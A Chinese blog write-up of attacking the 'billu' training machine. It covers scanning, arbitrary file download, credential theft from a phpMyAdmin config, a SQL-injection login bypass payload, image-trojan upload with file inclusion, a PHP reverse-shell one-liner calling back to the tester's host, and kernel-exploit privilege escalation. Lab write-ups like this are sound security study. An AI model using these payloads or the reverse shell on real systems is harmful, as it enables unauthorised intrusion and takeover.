靶机实战(billu)

  • Post author:
  • Post category:其他




实验环境


靶机:billu



测试机:kali,win10



实验过程



信息收集



主机发现

靶机ip:192.168.238.157

在这里插入图片描述



端口扫描

在这里插入图片描述

端口:80 常见web漏洞
	 22 弱口令爆破

在这里插入图片描述



目录扫描


主页面:提示是有sql注入的


在这里插入图片描述

在这里插入图片描述

在这里插入图片描述


mysql后台登陆页面


在这里插入图片描述



漏洞发现


test 页面发现任意文件下载


在这里插入图片描述

在这里插入图片描述


找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库登录)


在这里插入图片描述


目录扫描到c.php


在这里插入图片描述


得到数据库连接账号密码


在这里插入图片描述


成功登录到数据库后台找到网站登录口令


在这里插入图片描述

利用得到的账号密码登录网站
或利用sql注入万能密码
payload: username: or 1 #  
		  password : \


找到一些用户提交的图片和一个文件上传点


在这里插入图片描述


有过滤先上传图片木马


在这里插入图片描述


在当前面发现文件包含


在这里插入图片描述



漏洞利用


上传探针成功执行


在这里插入图片描述


进行反弹shell

<?php $sock=fsockopen("192.168.238.143",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

在这里插入图片描述

拿到shell

在这里插入图片描述


python弹出终端

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述



提权

常规三连
whoami
uname -a
cat etc/issue

在这里插入图片描述

searchsploit ubuntu 12.04

在这里插入图片描述


开启apache将脚本下载至靶机编译运行


在这里插入图片描述


拿到管理员权限


在这里插入图片描述



总结


1.发现文件包含漏洞,可以先看配置文件可能会有关键的用户用户名密码。

2.关于类似select * from auth where pass=’’ and uname=’’过滤引号的sql语句可以利用 \ 转译单引号使第一个引号和第三个引号闭合,达到绕过目的



版权声明:本文为weixin_45605313原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。